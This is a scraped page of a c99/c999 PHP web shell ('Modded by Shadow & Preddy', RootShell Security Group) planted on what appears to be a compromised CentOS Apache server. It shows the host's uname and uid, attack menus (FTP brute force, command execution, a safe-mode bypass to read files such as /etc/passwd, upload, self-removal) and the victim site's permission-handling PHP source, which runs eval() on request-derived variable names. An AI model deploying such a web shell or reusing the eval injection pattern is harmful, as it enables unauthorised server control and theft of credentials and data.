!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/ums/   drwxr-xr-x
Free 52.61 GB of 127.8 GB (41.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processUmPermission.php (2.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
include_once("global.php");
include_once(
"../class/clsConnection.php");
include_once(
"../class/clsDB.php");
include_once(
"clsUmPermission.php");
include_once(
"clsUmGPermission.php");
$oC = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']);
$oPm = new umpermission($oC);
$oGPm= new umgpermission($oC);

if (
$resetall){
    
$oPm->DeleteByUs($UsID);
}
else{
    if (
$check) {
        
$aBox $mnid;                            //array $mnid
        
$aBox_count=count($aBox);            // count how many values in array
        
if  ($aBox_count>0){
            foreach (
$aBox as $v) {                //$v is a MnID
                
eval("\$x=\$_".$v."x;");
                eval(
"\$c=\$_".$v."c;");
                eval(
"\$r=\$_".$v."r;");
                eval(
"\$u=\$_".$v."u;");
                eval(
"\$d=\$_".$v."d;");
                if (
$x$x=1;    else $x=0;
                if (
$c$c=1;    else $c=0;
                if (
$r$r=1;    else $r=0;
                if (
$u$u=1;    else $u=0;
                if (
$d$d=1;    else $d=0;
                
//not check all,  check in umPermission only
                
if (! ($x and $c and $r and $u and $d)){
                    
$oPm->SearchByKey($UsID$v);
                    if (
$oPm->GetRowSelected()>0){
                        
$oPm->GetRecord();
                        
$oPm->Edit();
                    }else{
                        
$oPm->AddNew();
                        
$oPm->pmUsID=$UsID;
                        
$oPm->pmMnID=$v;
                    }
                    
$oPm->pmX$x;
                    
$oPm->pmC$c;
                    
$oPm->pmR$r;
                    
$oPm->pmU$u;
                    
$oPm->pmD$d;
                    
$oPm->Save();            
                }else{    
//check all
                    
$oPm->SearchByKey($UsID$v);
                    if (
$oPm->GetRowSelected()>0){
                        
$oPm->GetRecord();
                        
$oPm->Edit();
                        
$oPm->pmX$x;
                        
$oPm->pmC$c;
                        
$oPm->pmR$r;
                        
$oPm->pmU$u;
                        
$oPm->pmD$d;
                        
$oPm->Save();            
                    }else{
                        
$oGPm->SearchByKey($GpID,$v);
                        if (
$oGPm->GetRowSelected()>0){
                            
$oPm->AddNew();
                            
$oPm->pmUsID=$UsID;
                            
$oPm->pmMnID=$v;
                            
$oPm->pmX$x;
                            
$oPm->pmC$c;
                            
$oPm->pmR$r;
                            
$oPm->pmU$u;
                            
$oPm->pmD$d;
                            
$oPm->Save();
                        }
                    }
                }    
//end if
            
}    //end for each
        
}    //end if
    
}
}
$oC->Disconnect();

echo 
"<meta http-equiv='refresh' content='0; URL=umPermission.php?UsID=$UsID'>";
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0111 ]--